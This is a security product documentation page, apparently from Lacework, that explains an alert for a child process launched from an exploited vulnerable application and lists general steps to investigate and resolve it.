Skip to main content

New Child Launched From Vulnerable Application

This alert occurs when Lacework detects a vulnerable software application has been exploited by an attacker, allowing them to execute additional code on the system. This additional code is often called a "child process" or "child application" that is launched by the vulnerable parent application.

Why this alert is important

This type of alert is significant because it indicates that an attacker has gained unauthorized access to a system and attempted to execute malicious code. The child application may be designed to perform various malicious activities, such as stealing sensitive data, installing malware or backdoors, or launching further attacks on other systems.

Investigation

Follow these steps to investigate the alert:

  1. Identify the vulnerable application that triggered the alert. Look for logs or notifications indicating which application was involved.
  2. Determine the nature of the vulnerability. Research the application and its known vulnerabilities to better understand what may have caused the event.
  3. Review system logs and other relevant data. Look for any anomalous behavior, such as unexpected network traffic or unusual file activity, that may indicate a security breach or compromise.
  4. Identify the child process that was launched. Determine the purpose and function of the child process and whether it is authorized to run on the system.
  5. Analyze the behavior of the child process. Look for suspicious activity, such as attempts to access sensitive data or create new processes.
  6. Assess the potential impact of the incident. Determine whether sensitive data or systems may have been compromised and take appropriate action to mitigate the risk.

Resolution

Use the following steps to resolve this alert:

  1. Patch or update the vulnerable application to the latest version to eliminate known security vulnerabilities.
  2. Implement security controls such as firewalls, intrusion detection systems, and antivirus software to help detect and prevent any unauthorized or malicious activities on the system.
  3. Regularly monitor system logs and other activity to detect any signs of unauthorized access or malicious activity and take appropriate action to remediate any identified issues.